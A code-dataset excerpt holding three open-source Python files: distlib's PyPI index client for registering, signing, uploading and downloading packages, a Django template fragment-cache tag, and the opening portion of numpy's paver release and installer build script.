repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
nitin-cherian/Webapps | TalkPython/P4E/my_web_app/.env/lib/python3.5/site-packages/pip/_vendor/distlib/index.py | 328 | 21085 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
self.rpc_proxy = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
if self.rpc_proxy is None:
self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
return self.rpc_proxy.search(terms, operator or 'and')
| mit |
ProfessionalIT/maxigenios-website | sdk/google_appengine/google/appengine/_internal/django/templatetags/cache.py | 23 | 2568 | from google.appengine._internal.django.template import Library, Node, TemplateSyntaxError, Variable, VariableDoesNotExist
from google.appengine._internal.django.template import resolve_variable
from google.appengine._internal.django.core.cache import cache
from google.appengine._internal.django.utils.encoding import force_unicode
from google.appengine._internal.django.utils.http import urlquote
from google.appengine._internal.django.utils.hashcompat import md5_constructor
register = Library()
class CacheNode(Node):
def __init__(self, nodelist, expire_time_var, fragment_name, vary_on):
self.nodelist = nodelist
self.expire_time_var = Variable(expire_time_var)
self.fragment_name = fragment_name
self.vary_on = vary_on
def render(self, context):
try:
expire_time = self.expire_time_var.resolve(context)
except VariableDoesNotExist:
raise TemplateSyntaxError('"cache" tag got an unknown variable: %r' % self.expire_time_var.var)
try:
expire_time = int(expire_time)
except (ValueError, TypeError):
raise TemplateSyntaxError('"cache" tag got a non-integer timeout value: %r' % expire_time)
# Build a unicode key for this fragment and all vary-on's.
args = md5_constructor(u':'.join([urlquote(resolve_variable(var, context)) for var in self.vary_on]))
cache_key = 'template.cache.%s.%s' % (self.fragment_name, args.hexdigest())
value = cache.get(cache_key)
if value is None:
value = self.nodelist.render(context)
cache.set(cache_key, value, expire_time)
return value
def do_cache(parser, token):
"""
This will cache the contents of a template fragment for a given amount
of time.
Usage::
{% load cache %}
{% cache [expire_time] [fragment_name] %}
.. some expensive processing ..
{% endcache %}
This tag also supports varying by a list of arguments::
{% load cache %}
{% cache [expire_time] [fragment_name] [var1] [var2] .. %}
.. some expensive processing ..
{% endcache %}
Each unique set of arguments will result in a unique cache entry.
"""
nodelist = parser.parse(('endcache',))
parser.delete_first_token()
tokens = token.contents.split()
if len(tokens) < 3:
raise TemplateSyntaxError(u"'%r' tag requires at least 2 arguments." % tokens[0])
return CacheNode(nodelist, tokens[1], tokens[2], tokens[3:])
register.tag('cache', do_cache)
| mit |
skwbc/numpy | pavement.py | 9 | 21849 | """
This paver file is intented to help with the release process as much as
possible. It relies on virtualenv to generate 'bootstrap' environments as
independent from the user system as possible (e.g. to make sure the sphinx doc
is built against the built numpy, not an installed one).
Building a fancy dmg from scratch
=================================
Clone the numpy-macosx-installer git repo from on github into the source tree
(numpy-macosx-installer should be in the same directory as setup.py). Then, do
as follows::
git clone git://github.com/cournape/macosx-numpy-installer
# remove build dir, and everything generated by previous paver calls
# (included generated installers). Use with care !
paver nuke
paver bootstrap && source bootstrap/bin/activate
# Installing numpy is necessary to build the correct documentation (because
# of autodoc)
python setup.py install
paver dmg
Building a simple (no-superpack) windows installer from wine
============================================================
It assumes that blas/lapack are in c:\local\lib inside drive_c.
paver bdist_wininst_simple
You will have to configure your wine python locations (WINE_PYS).
The superpack requires all the atlas libraries for every arch to be installed
(see SITECFG), and can then be built as follows::
paver bdist_superpack
Building changelog + notes
==========================
Assumes you have git and the binaries/tarballs in installers/::
paver write_release
paver write_note
This automatically put the checksum into NOTES.txt, and write the Changelog
which can be uploaded to sourceforge.
TODO
====
- the script is messy, lots of global variables
- make it more easily customizable (through command line args)
- missing targets: install & test, sdist test, debian packaging
- fix bdist_mpkg: we build the same source twice -> how to make sure we use
the same underlying python for egg install in venv and for bdist_mpkg
"""
from __future__ import division, print_function
# What need to be installed to build everything on mac os x:
# - wine: python 2.6 and 2.5 + makensis + cpuid plugin + mingw, all in the PATH
# - paver + virtualenv
# - full texlive
import os
import sys
import shutil
import subprocess
import re
try:
from hashlib import md5
from hashlib import sha256
except ImportError:
from md5 import md5
import paver
from paver.easy import \
options, Bunch, task, call_task, sh, needs, cmdopts, dry
sys.path.insert(0, os.path.dirname(__file__))
try:
setup_py = __import__("setup")
FULLVERSION = setup_py.VERSION
# This is duplicated from setup.py
if os.path.exists('.git'):
GIT_REVISION = setup_py.git_version()
elif os.path.exists('numpy/version.py'):
# must be a source distribution, use existing version file
from numpy.version import git_revision as GIT_REVISION
else:
GIT_REVISION = "Unknown"
if not setup_py.ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
finally:
sys.path.pop(0)
#-----------------------------------
# Things to be changed for a release
#-----------------------------------
# Source of the release notes
RELEASE_NOTES = 'doc/release/1.12.0-notes.rst'
# Start/end of the log (from git)
LOG_START = 'maintenance/1.11.x'
LOG_END = 'master'
#-------------------------------------------------------
# Hardcoded build/install dirs, virtualenv options, etc.
#-------------------------------------------------------
DEFAULT_PYTHON = "2.7"
# Where to put the final installers, as put on sourceforge
SUPERPACK_BUILD = 'build-superpack'
SUPERPACK_BINDIR = os.path.join(SUPERPACK_BUILD, 'binaries')
options(bootstrap=Bunch(bootstrap_dir="bootstrap"),
virtualenv=Bunch(packages_to_install=["sphinx==1.1.3", "numpydoc"],
no_site_packages=False),
sphinx=Bunch(builddir="build", sourcedir="source", docroot='doc'),
superpack=Bunch(builddir="build-superpack"),
installers=Bunch(releasedir="release",
installersdir=os.path.join("release", "installers")),
doc=Bunch(doc_root="doc",
sdir=os.path.join("doc", "source"),
bdir=os.path.join("doc", "build"),
bdir_latex=os.path.join("doc", "build", "latex"),
destdir_pdf=os.path.join("build_doc", "pdf")
),
html=Bunch(builddir=os.path.join("build", "html")),
dmg=Bunch(python_version=DEFAULT_PYTHON),
bdist_wininst_simple=Bunch(python_version=DEFAULT_PYTHON),
)
MPKG_PYTHON = {
"2.6": ["/Library/Frameworks/Python.framework/Versions/2.6/bin/python"],
"2.7": ["/Library/Frameworks/Python.framework/Versions/2.7/bin/python"],
"3.2": ["/Library/Frameworks/Python.framework/Versions/3.2/bin/python3"],
"3.3": ["/Library/Frameworks/Python.framework/Versions/3.3/bin/python3"],
"3.4": ["/Library/Frameworks/Python.framework/Versions/3.4/bin/python3"],
}
SSE3_CFG = {'ATLAS': r'C:\local\lib\atlas\sse3'}
SSE2_CFG = {'ATLAS': r'C:\local\lib\atlas\sse2'}
NOSSE_CFG = {'BLAS': r'C:\local\lib\atlas\nosse', 'LAPACK': r'C:\local\lib\atlas\nosse'}
SITECFG = {"sse2" : SSE2_CFG, "sse3" : SSE3_CFG, "nosse" : NOSSE_CFG}
if sys.platform =="darwin":
WINDOWS_PYTHON = {
"3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
"3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
"3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
"2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
"2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
}
WINDOWS_ENV = os.environ
WINDOWS_ENV["DYLD_FALLBACK_LIBRARY_PATH"] = "/usr/X11/lib:/usr/lib"
MAKENSIS = ["wine", "makensis"]
elif sys.platform == "win32":
WINDOWS_PYTHON = {
"3.4": ["C:\Python34\python.exe"],
"3.3": ["C:\Python33\python.exe"],
"3.2": ["C:\Python32\python.exe"],
"2.7": ["C:\Python27\python.exe"],
"2.6": ["C:\Python26\python.exe"],
}
# XXX: find out which env variable is necessary to avoid the pb with python
# 2.6 and random module when importing tempfile
WINDOWS_ENV = os.environ
MAKENSIS = ["makensis"]
else:
WINDOWS_PYTHON = {
"3.4": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python34/python.exe"],
"3.3": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python33/python.exe"],
"3.2": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python32/python.exe"],
"2.7": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python27/python.exe"],
"2.6": ["wine", os.environ['HOME'] + "/.wine/drive_c/Python26/python.exe"],
}
WINDOWS_ENV = os.environ
MAKENSIS = ["wine", "makensis"]
#-------------------
# Windows installers
#-------------------
def superpack_name(pyver, numver):
"""Return the filename of the superpack installer."""
return 'numpy-%s-win32-superpack-python%s.exe' % (numver, pyver)
def internal_wininst_name(arch):
"""Return the name of the wininst as it will be inside the superpack (i.e.
with the arch encoded."""
ext = '.exe'
return "numpy-%s-%s%s" % (FULLVERSION, arch, ext)
def wininst_name(pyver):
"""Return the name of the installer built by wininst command."""
ext = '.exe'
return "numpy-%s.win32-py%s%s" % (FULLVERSION, pyver, ext)
def prepare_nsis_script(pyver, numver):
if not os.path.exists(SUPERPACK_BUILD):
os.makedirs(SUPERPACK_BUILD)
tpl = os.path.join('tools/win32build/nsis_scripts', 'numpy-superinstaller.nsi.in')
source = open(tpl, 'r')
target = open(os.path.join(SUPERPACK_BUILD, 'numpy-superinstaller.nsi'), 'w')
installer_name = superpack_name(pyver, numver)
cnt = "".join(source.readlines())
cnt = cnt.replace('@NUMPY_INSTALLER_NAME@', installer_name)
for arch in ['nosse', 'sse2', 'sse3']:
cnt = cnt.replace('@%s_BINARY@' % arch.upper(),
internal_wininst_name(arch))
target.write(cnt)
def bdist_wininst_arch(pyver, arch):
"""Arch specific wininst build."""
if os.path.exists("build"):
shutil.rmtree("build")
_bdist_wininst(pyver, SITECFG[arch])
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_superpack(options):
"""Build all arch specific wininst installers."""
pyver = options.python_version
def copy_bdist(arch):
# Copy the wininst in dist into the release directory
source = os.path.join('dist', wininst_name(pyver))
target = os.path.join(SUPERPACK_BINDIR, internal_wininst_name(arch))
if os.path.exists(target):
os.remove(target)
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
try:
os.rename(source, target)
except OSError:
# When git is installed on OS X but not under Wine, the name of the
# .exe has "-Unknown" in it instead of the correct git revision.
# Try to fix this here:
revidx = source.index(".dev-") + 5
gitrev = source[revidx:revidx+7]
os.rename(source.replace(gitrev, "Unknown"), target)
bdist_wininst_arch(pyver, 'nosse')
copy_bdist("nosse")
bdist_wininst_arch(pyver, 'sse2')
copy_bdist("sse2")
bdist_wininst_arch(pyver, 'sse3')
copy_bdist("sse3")
idirs = options.installers.installersdir
pyver = options.python_version
prepare_nsis_script(pyver, FULLVERSION)
subprocess.check_call(MAKENSIS + ['numpy-superinstaller.nsi'],
cwd=SUPERPACK_BUILD)
# Copy the superpack into installers dir
if not os.path.exists(idirs):
os.makedirs(idirs)
source = os.path.join(SUPERPACK_BUILD, superpack_name(pyver, FULLVERSION))
target = os.path.join(idirs, superpack_name(pyver, FULLVERSION))
shutil.copy(source, target)
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_nosse(options):
"""Build the nosse wininst installer."""
bdist_wininst_arch(options.python_version, 'nosse')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse2(options):
"""Build the sse2 wininst installer."""
bdist_wininst_arch(options.python_version, 'sse2')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_sse3(options):
"""Build the sse3 wininst installer."""
bdist_wininst_arch(options.python_version, 'sse3')
@task
@cmdopts([("python-version=", "p", "python version")])
def bdist_wininst_simple():
"""Simple wininst-based installer."""
pyver = options.bdist_wininst_simple.python_version
_bdist_wininst(pyver)
def _bdist_wininst(pyver, cfg_env=None):
cmd = WINDOWS_PYTHON[pyver] + ['setup.py', 'build', '-c', 'mingw32', 'bdist_wininst']
if cfg_env:
for k, v in WINDOWS_ENV.items():
cfg_env[k] = v
else:
cfg_env = WINDOWS_ENV
subprocess.check_call(cmd, env=cfg_env)
#----------------
# Bootstrap stuff
#----------------
@task
def bootstrap(options):
"""create virtualenv in ./bootstrap"""
try:
import virtualenv
except ImportError as e:
raise RuntimeError("virtualenv is needed for bootstrap")
bdir = options.bootstrap_dir
if not os.path.exists(bdir):
os.makedirs(bdir)
bscript = "boostrap.py"
options.virtualenv.script_name = os.path.join(options.bootstrap_dir,
bscript)
options.virtualenv.no_site_packages = False
options.bootstrap.no_site_packages = False
call_task('paver.virtual.bootstrap')
sh('cd %s; %s %s' % (bdir, sys.executable, bscript))
@task
def clean():
"""Remove build, dist, egg-info garbage."""
d = ['build', 'dist', 'numpy.egg-info']
for i in d:
if os.path.exists(i):
shutil.rmtree(i)
bdir = os.path.join('doc', options.sphinx.builddir)
if os.path.exists(bdir):
shutil.rmtree(bdir)
@task
def clean_bootstrap():
bdir = os.path.join(options.bootstrap.bootstrap_dir)
if os.path.exists(bdir):
shutil.rmtree(bdir)
@task
@needs('clean', 'clean_bootstrap')
def nuke(options):
"""Remove everything: build dir, installers, bootstrap dirs, etc..."""
for d in [options.superpack.builddir, options.installers.releasedir]:
if os.path.exists(d):
shutil.rmtree(d)
#---------------------
# Documentation tasks
#---------------------
@task
def html(options):
"""Build numpy documentation and put it into build/docs"""
# Don't use paver html target because of numpy bootstrapping problems
bdir = os.path.join("doc", options.sphinx.builddir, "html")
if os.path.exists(bdir):
shutil.rmtree(bdir)
subprocess.check_call(["make", "html"], cwd="doc")
html_destdir = options.html.builddir
if os.path.exists(html_destdir):
shutil.rmtree(html_destdir)
shutil.copytree(bdir, html_destdir)
@task
def latex():
"""Build numpy documentation in latex format."""
subprocess.check_call(["make", "latex"], cwd="doc")
@task
@needs('latex')
def pdf():
sdir = options.doc.sdir
bdir = options.doc.bdir
bdir_latex = options.doc.bdir_latex
destdir_pdf = options.doc.destdir_pdf
def build_pdf():
subprocess.check_call(["make", "all-pdf"], cwd=str(bdir_latex))
dry("Build pdf doc", build_pdf)
if os.path.exists(destdir_pdf):
shutil.rmtree(destdir_pdf)
os.makedirs(destdir_pdf)
user = os.path.join(bdir_latex, "numpy-user.pdf")
shutil.copy(user, os.path.join(destdir_pdf, "userguide.pdf"))
ref = os.path.join(bdir_latex, "numpy-ref.pdf")
shutil.copy(ref, os.path.join(destdir_pdf, "reference.pdf"))
#------------------
# Mac OS X targets
#------------------
def dmg_name(fullversion, pyver, osxver=None):
"""Return name for dmg installer.
Notes
-----
Python 2.7 has two binaries, one for 10.3 (ppc, i386) and one for 10.6
(i386, x86_64). All other Python versions at python.org at the moment
have binaries for 10.3 only. The "macosx%s" part of the dmg name should
correspond to the python.org naming scheme.
"""
# assume that for the py2.7/osx10.6 build the deployment target is set
# (should be done in the release script).
if not osxver:
osxver = os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.3')
return "numpy-%s-py%s-python.org-macosx%s.dmg" % (fullversion, pyver,
osxver)
def macosx_version():
if not sys.platform == 'darwin':
raise ValueError("Not darwin ??")
st = subprocess.Popen(["sw_vers"], stdout=subprocess.PIPE)
out = st.stdout.readlines()
ver = re.compile("ProductVersion:\s+([0-9]+)\.([0-9]+)\.([0-9]+)")
for i in out:
m = ver.match(i)
if m:
return m.groups()
def mpkg_name(pyver):
maj, min = macosx_version()[:2]
# Note that bdist_mpkg breaks this if building a dev version with a git
# commit string attached. make_fullplatcomponents() in
# bdist_mpkg/cmd_bdist_mpkg.py replaces '-' with '_', comment this out if
# needed.
return "numpy-%s-py%s-macosx%s.%s.mpkg" % (FULLVERSION, pyver, maj, min)
def _build_mpkg(pyver):
# account for differences between Python 2.7.1 versions from python.org
if os.environ.get('MACOSX_DEPLOYMENT_TARGET', None) == "10.6":
ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch x86_64 -Wl,-search_paths_first"
else:
ldflags = "-undefined dynamic_lookup -bundle -arch i386 -arch ppc -Wl,-search_paths_first"
ldflags += " -L%s" % os.path.join(os.path.dirname(__file__), "build")
sh("LDFLAGS='%s' %s setup.py bdist_mpkg" % (ldflags, " ".join(MPKG_PYTHON[pyver])))
@task
def simple_dmg():
pyver = "2.6"
src_dir = "dmg-source"
# Clean the source dir
if os.path.exists(src_dir):
shutil.rmtree(src_dir)
os.makedirs(src_dir)
# Build the mpkg
clean()
_build_mpkg(pyver)
# Build the dmg
shutil.copytree(os.path.join("dist", mpkg_name(pyver)),
os.path.join(src_dir, mpkg_name(pyver)))
_create_dmg(pyver, src_dir, "NumPy Universal %s" % FULLVERSION)
@task
def bdist_mpkg(options):
call_task("clean")
try:
pyver = options.bdist_mpkg.python_version
except AttributeError:
pyver = options.python_version
_build_mpkg(pyver)
def _create_dmg(pyver, src_dir, volname=None):
# Build the dmg
image_name = dmg_name(FULLVERSION, pyver)
if os.path.exists(image_name):
os.remove(image_name)
cmd = ["hdiutil", "create", image_name, "-srcdir", src_dir]
if volname:
cmd.extend(["-volname", "'%s'" % volname])
sh(" ".join(cmd))
@task
@cmdopts([("python-version=", "p", "python version")])
def dmg(options):
try:
pyver = options.dmg.python_version
except:
pyver = DEFAULT_PYTHON
idirs = options.installers.installersdir
# Check if docs exist. If not, say so and quit.
ref = os.path.join(options.doc.destdir_pdf, "reference.pdf")
user = os.path.join(options.doc.destdir_pdf, "userguide.pdf")
if (not os.path.exists(ref)) or (not os.path.exists(user)):
import warnings
warnings.warn("Docs need to be built first! Can't find them.", stacklevel=2)
# Build the mpkg package
call_task("clean")
_build_mpkg(pyver)
macosx_installer_dir = "tools/numpy-macosx-installer"
dmg = os.path.join(macosx_installer_dir, dmg_name(FULLVERSION, pyver))
if os.path.exists(dmg):
os.remove(dmg)
# Clean the image source
content = os.path.join(macosx_installer_dir, 'content')
if os.path.exists(content):
shutil.rmtree(content)
os.makedirs(content)
# Copy mpkg into image source
